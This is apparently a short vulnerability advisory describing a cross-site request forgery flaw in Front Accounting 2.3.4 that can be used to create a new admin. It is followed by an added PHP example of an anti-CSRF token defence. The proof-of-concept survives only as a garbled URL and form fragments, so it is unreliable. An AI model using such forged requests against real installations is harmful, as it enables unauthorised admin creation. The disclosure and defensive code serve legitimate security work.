Front Accounting 2.3.4 CSRF Vulnerability



EKU-ID: 132 CVE: OSVDB-ID:
Author: John Published: 2011-05-04 Verified: Not Verified


# Software................Front Accounting 2.3.4
# Vulnerability...........Cross-site Request Forgery
# Threat Level............Low (1/5)
# Download................http://frontaccounting.com/wb3/
# Discovery Date..........4/27/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A cross-site request forgery vulnerability in Front Accounting 2.3.4
# can be exploited to create a new admin.
#
#
# --PoC-->

http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml">
            x@x.com" />
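
The control that stops this class of request is a per-session anti-CSRF token checked before the privileged action runs. The PHP below is an added example, not FrontAccounting's code and not part of the original advisory; the function names csrf_token() and csrf_verify(), the session key and the `_token` form field are hypothetical, and it assumes the state-changing request is a POST.

```php
<?php
// Added example (not FrontAccounting code): synchronizer-token CSRF check
// in front of a state-changing admin action such as user creation.
// csrf_token(), csrf_verify() and the '_token' field are hypothetical names.

// Defense in depth: SameSite=Lax keeps the session cookie off cross-site POSTs
// (array form of session_set_cookie_params requires PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

/** Return the per-session token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session copy. */
function csrf_verify($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // is_string() rejects array input such as _token[]=x before hash_equals().
    return $expected !== '' && is_string($submitted)
        && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject before any privileged work: a forged cross-site request can ride
    // the victim's session cookie but cannot read the token tied to the session.
    if (!csrf_verify($_POST['_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // The application's existing user-creation logic runs only past this point.
}
?>
<form method="post">
  <input type="hidden" name="_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <!-- the application's existing form fields go here -->
</form>
```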